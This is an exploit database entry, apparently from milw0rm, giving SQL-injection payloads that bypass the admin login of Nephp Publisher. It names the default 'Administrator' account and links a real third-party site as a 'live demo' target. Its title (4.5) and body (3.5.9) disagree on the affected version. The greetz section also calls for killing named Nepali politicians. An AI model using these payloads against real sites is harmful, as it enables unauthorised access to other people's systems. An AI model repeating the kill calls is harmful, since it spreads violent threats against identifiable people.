Nephp Publisher Enterprise 4.5 - Authentication Bypass

2009-09-17T00:00:00
ID EXPLOITPACK:95651D930A7BEA8A916AA29712F25BD7
Type exploitpack
Reporter learn3r hacker
Modified 2009-09-17T00:00:00

Description

Nephp Publisher Enterprise 4.5 - Authentication Bypass

                                        
                                            #############################################
#  NEPHP publisher SQLi login bypass	    #
#     By learn3r hacker from Nepal	    #
#      damagicalhacker@gmail.com	    #
#############################################

Affected version: v 3.5.9 or may be lower...

Username: valid_username'#  [eg. Administrator/*]
Password: learn3r  [or whatever]

Or
Username: ' or 1='1'#
password: learn3r [or whatever]

Live Demo: http://andhracafe.com/admin/index.php

Note that Administrator is a default username in this product

Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-17]